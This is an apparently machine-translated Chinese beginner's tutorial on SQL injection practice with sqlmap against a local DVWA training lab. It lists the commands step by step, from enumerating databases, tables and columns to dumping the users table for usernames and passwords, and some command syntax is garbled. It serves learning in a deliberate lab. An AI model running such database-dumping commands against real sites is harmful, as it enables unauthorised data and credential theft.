菜鸟sql注入学习 sql语句 菜鸟

菜鸟sql注入学习菜鸟sql注入学习
一.工具
1.在虚拟机(windows10)中搭建dvwa靶场
2.安装SQLmap(前提是有python环境)
3.调试
二.初体验
1.打开靶场工具,输入用户

菜鸟sql注入学习

一.工具

1.在虚拟机(windows10)中搭建dvwa靶场

2.安装SQLmap(前提是有python环境)

3.调试

二.初体验

1.打开靶场工具,输入用户名密码后登录进入靶场,按照下图选择难度,这里我选择最低级low

2.如下图,先选择sql注入模块,选择后在输入框随便输入数字,我输入的是321,记住红框的参数,后期用到。

三.开始实验

请打开sqlmap并检查sqlmap是否可用。尽快开始:

1. 列出数据库

sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –dbs –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl \’–dbs;

注:(http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit# 和PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl;security=low 将替换为上面红框中标记的参数。)等等。

-u 参数代表URL,指定连接目标。

dbs 表示目标中列出的数据库。

看这个图,第一个大红色框表示有一个注入点,第二个红色框表示有两个数据库(dvwa和information_schema)。

2. 列出数据表

sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl\’ -D dvwa –tables;

-D,指定数据库

tables,列出数据库中的所有表。

有两张桌子

3、查询表的结构

sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \”PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl; security=low\” -D dvwa -T users –columns

-T,指定表

columns 指定表中列出的所有列的名称和数据类型。

4、列出数据信息及多条数据

sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl; security=low\’ -D dvwa -T users –count

5 数据

5、显示所有查询到的数据条

sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl\’ -D dvwa -T users –dump

转储、列出数据

此时,您已经有了数据库用户名和密码。

我们欢迎任何沟通或更正。

以上关于#Newbie SQL注入学习的相关内容摘自网络,仅供大家参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92306.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月26日 下午11:39
下一篇 2024年6月26日 下午11:39

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注